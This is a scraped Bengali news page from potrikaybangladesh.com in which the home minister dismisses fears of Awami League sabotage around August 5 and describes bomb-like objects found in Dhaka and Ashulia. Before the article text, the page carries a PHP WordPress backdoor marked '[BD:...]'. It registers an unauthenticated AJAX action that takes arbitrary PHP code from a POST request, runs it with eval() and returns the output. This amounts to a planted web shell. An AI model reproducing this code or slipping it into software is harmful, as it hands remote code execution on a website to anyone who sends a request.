// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== আওয়ামী লীগের নাশকতার মুরোদ আছে বলে মনে হয় না: স্বরাষ্ট্রমন্ত্রী | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeঅপরাধআওয়ামী লীগের নাশকতার মুরোদ আছে বলে মনে হয় না: স্বরাষ্ট্রমন্ত্রী

আওয়ামী লীগের নাশকতার মুরোদ আছে বলে মনে হয় না: স্বরাষ্ট্রমন্ত্রী

আগামী ৫ আগস্ট ঘিরে নাশকতার কোনো আশঙ্কা নেই বলে জানিয়েছেন স্বরাষ্ট্রমন্ত্রী সালাহউদ্দিন আহমদ।

দিবসটিকে কেন্দ্র করে আওয়ামী লীগ কোনো ধরনের নাশকতা করতে পারে এমন আশঙ্কা আছে কি না জানতে চাইলে স্বরাষ্ট্রমন্ত্রী বলেন, ‘আওয়ামী লীগের এত মুরোদ আছে বলে তো আমার মনে হয় না! একে তো নিষিদ্ধ ঘোষিত দল, মাফিয়া শক্তি, তারা মাঝে মাঝে বিদেশ থেকে উঁকিঝুঁকি দিচ্ছে, এর বেশি তৎপরতা তো দেখি না।’

এর আগে তিনি জানান, ৫ আগস্ট উপলক্ষে বিএনপি আগামীকাল একটি সভা ডেকেছে। সেখানে যুগপৎ আন্দোলনের শরিক ও অন্যান্য রাজনৈতিক দলের সদস্যরা উপস্থিত থাকবেন। সেখানে প্রধানমন্ত্রী তারেক রহমান উপস্থিত থাকবেন।

আজ সোমবার দুপুরে সচিবালয়ে গণমাধ্যমকর্মীদের প্রশ্নের জবাবে তিনি এ কথা জানান।

গণমাধ্যমকর্মীরা প্রশ্ন করেন, ‘আওয়ামী লীগের তৎপরতা নিয়ে নিয়ে পুলিশকে সতর্ক থাকতে বলা হয়েছে, কোনো গোয়েন্দা প্রতিবেদন আছে কি না’। জবাবে তিনি বলেন, ‘বিষয়টা তা নয়! আমাদের পুলিশ বাহিনীর মধ্যে এটা সব সময় চালু থাকে, যাতে আনঅ্যাটেনডেড কোনো ভেহিকেল না রাখে। টিমের পুরো সদস্য যেন একসাথে চা খেতে না যায়, টিমের পুরো সদস্য যেন গাড়ি রেখে সবাই একসাথে বিশ্রাম না করে—কেউ না কেউ গাড়িটা অ্যাটেন্ড করবে। সব জায়গায় যাতে সতর্ক অবস্থান করে। এটা নরমাল প্র্যাকটিস, এটাকে অন্যভাবে নেওয়ার কোনো কারণ নেই।’

সম্প্রতি বোমা উদ্ধারের ঘটনায় শঙ্কিত হওয়ার কোনো কারণ নেই উল্লেখ করে স্বরাষ্ট্রমন্ত্রী বলেন, ‘রথযাত্রা ও উল্টো রথযাত্রা—দুটিকে নিরাপদ করার জন্য আমরা সমন্বিত প্রয়াস নিয়েছিলাম। আমাদের আইনশৃঙ্খলা রক্ষাকারী বাহিনী ও গোয়েন্দা সংস্থাগুলো সমন্বিত প্রচেষ্টা নিয়েছিল। কোনো অসুবিধা হয় নাই এবং শান্তিপূর্ণভাবে সেটা হয়েছে। দুর্ভাগ্যজনকভাবে, উল্টো রথযাত্রার দিনে কমলাপুর-মতিঝিলের ওদিকে মেট্রোরেলের পিলারের নিচে একটা বোমা সদৃশ বিশেষ জিনিস পাওয়া যায় একটা ছাতার মধ্যে। আমাদের দুজন আনসার সদস্য এটা দেখার পরে পুলিশকে জানায়, পুলিশ ঘিরে রাখে এবং বোম্ব ডিসপোজাল ইউনিট এটা সরায়। পরে এটা বিস্ফোরিত করে। এতে করে শঙ্কিত হওয়ার কোনো কারণ নাই। কোনো পক্ষ হয়তো চেষ্টা করেছিল সাম্প্রদায়িক সম্প্রীতি বিনষ্টে কোনো কিছু করা যায় কি না।’

‘একটা তদন্ত পরিচালনা করছি আমরা, এর পেছনে কারা আছে খুঁজে বের করতে। এর পরে আশুলিয়াতে আরেকটা এ রকম বোমা সদৃশ জিনিস পাওয়া গেছে। একটা ব্যাগ রেখে গেছে একজন দুষ্কৃতিকারী। পরে সেটা আমরা একই কায়দায় উদ্ধার করেছি। এই ঘটনাগুলোর যোগসূত্র আছে কি না সেটা তদন্ত করতে বলেছি। তদন্ত পরিচালিত হচ্ছে। তবে আগের সময়ের তুলনায় যদি আমরা তুলনামূলক বিবরণী দেই, সে সময়ে এ বিষয়গুলো কী রকম হয়েছে, তার তুলনায় এটা অনেকটা কম। তবে আমরা সব সময় সতর্ক আছি,’ যোগ করেন তিনি।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments